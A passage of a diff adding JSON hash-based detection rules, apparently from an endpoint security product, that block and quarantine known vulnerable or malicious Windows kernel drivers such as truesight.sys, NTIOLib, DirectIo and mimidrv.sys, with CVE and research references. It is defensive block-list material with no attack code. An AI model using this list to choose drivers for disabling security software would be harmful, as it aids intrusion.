+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5690161-c80f-5802-a8df-247f29f8a9d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143416Z",
+ "creation_date": "2026-03-23T11:45:31.143418Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a81d5126c51d64cd3f6ead91efa079fc877d6cad2e69de1c37fc1be29984d50",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b586c611-c482-5ed5-bb27-8cf326ac17eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614351Z",
+ "creation_date": "2026-03-23T11:45:29.614352Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614358Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b58b3377-972a-5d0e-a5f1-d9aae599ce4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142471Z",
+ "creation_date": "2026-03-23T11:45:31.142473Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8c33ee4f007208b5a6f34dedd5a61d90fa27fb56c4ccba0e5a83702482106f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5935923-4698-519f-9c0d-715cd2c990c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465624Z",
+ "creation_date": "2026-03-23T11:45:30.465628Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465637Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a74e8f94d2c140646a8bb12e3e322c49a97bd1b8a2e4327863d3623f43d65c66",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b59d9749-418e-5fa6-ab42-49a6bde2554b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.473884Z",
+ "creation_date": "2026-03-23T11:45:30.473887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.473896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f94c8dee30d8d349d0b51b9f1624c49ef8b6b8d54d40ecf09af95011d01b705f",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b59de7dd-7c9e-56f3-b1be-f37f12b1ecef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811608Z",
+ "creation_date": "2026-03-23T11:45:31.811611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811617Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "617d5e50ebacff362232217b44ad1be06158214aa14cc46b60581acb530989fe",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5aa5e91-bd6a-5214-a4ee-fc79c2d4a532",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821156Z",
+ "creation_date": "2026-03-23T11:45:31.821159Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "955887adbe6565cedb6cd793db36c5a4083e12faf5883a310e43cce8c8b2fd9e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5b65bb7-fb1c-57ba-8177-cb13efb976b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618271Z",
+ "creation_date": "2026-03-23T11:45:29.618273Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618278Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c11305fc8da85568b2d41cdf030ce260815fea848af91dc0e01076d461bab919",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5d949d9-8be7-5dc1-8dd3-d18f5b5368dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808921Z",
+ "creation_date": "2026-03-23T11:45:31.808923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dec61fd459bc6d34645518d47257b636ffd5ae7d1dd50452ab53afa0d9d51006",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5e3ab8e-adeb-51ff-9ec8-56c2765211e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829646Z",
+ "creation_date": "2026-03-23T11:45:31.829648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829653Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c175dfa16b4f37e3cfde8ee8da821ad5fc5b95f03da51996abef2ba7223c4c11",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5efb753-7906-5b95-8b8b-ed16a063c0bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810029Z",
+ "creation_date": "2026-03-23T11:45:31.810031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810036Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea9a74b066bc5aac4377a438217f40509c43e2f0318553ad1fb248c6dfed9fe9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5f09107-7046-593e-9d26-cce0e4275603",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466128Z",
+ "creation_date": "2026-03-23T11:45:30.466132Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466141Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5295080de37d4838e15dec4e3682545033d479d3d9ac28d74747c086559fb968",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b5f1064e-988b-57c5-9df4-214c755aba76",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461268Z",
+ "creation_date": "2026-03-23T11:45:30.461271Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "965d4f981b54669a96c5ab02d09bf0a9850d13862425b8981f1a9271350f28bb",
+ "comment": "Vulnerable Kernel Driver (aka sfdrvx64.sys) [https://www.loldrivers.io/drivers/5a03dc5a-115d-4d6f-b5b5-685f4c014a69/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b61be673-4722-5513-a715-1252eb5a9aef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149260Z",
+ "creation_date": "2026-03-23T11:45:31.149263Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149272Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cc45bb77bf76a530d653340ab53548c4c3353be1088c1ded3b26fdb7e324c7b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6260e6d-05f4-52e6-a5f7-af363befb4df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826831Z",
+ "creation_date": "2026-03-23T11:45:31.826833Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826838Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "684ff3390c3e0ab64e278e86f12aa11751e2f7e25e61aecb8e47b0560be5a713",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b657a637-7188-5632-8106-a82614b1bceb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156552Z",
+ "creation_date": "2026-03-23T11:45:31.156554Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156559Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "182fe67f10ccaf1511093d66f02d554ec14b3e35f0e9f99b40d1b6cdf6bc3774",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b68d2caf-1c49-5327-8332-a6b3db88698b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616968Z",
+ "creation_date": "2026-03-23T11:45:29.616970Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616976Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "df4566edea7c02e29d7dc56ff3f7da6c1ef846e1063b2805a5180bb0d6db37e8",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b68ec021-7351-5ee4-908e-a1dc72390547",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146385Z",
+ "creation_date": "2026-03-23T11:45:31.146386Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146392Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "687af130c03ad59fb35b28447dc7ba5c2cda36969d31bf38bf3ebe676ede48ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b691a5ca-8282-503f-9990-cfbf2974187d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825307Z",
+ "creation_date": "2026-03-23T11:45:31.825310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825318Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6955b73194b48410331b0518e68dec23d8a40107dd72209b9097ae9a361f13d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6949fef-552c-55c6-b14c-61c8e6e050df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622419Z",
+ "creation_date": "2026-03-23T11:45:29.622421Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38b3eb8c86201d26353aab625cea672e60c2f66ce6f5e5eda673e8c3478bf305",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b694df8b-c982-5db3-a254-68d595fec621",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814547Z",
+ "creation_date": "2026-03-23T11:45:31.814550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814560Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f1628f379703dcf5a0711782af2a2dd895b1a57cacfd3e29f013fb074dc4174",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b6984ab0-6362-59b4-b954-1b8544ebf91f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826389Z",
+ "creation_date": "2026-03-23T11:45:30.826391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4144c5acae0a44ca3b2abbb9346bd17621bcdaaf66107ab5f4059d594b645bd1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
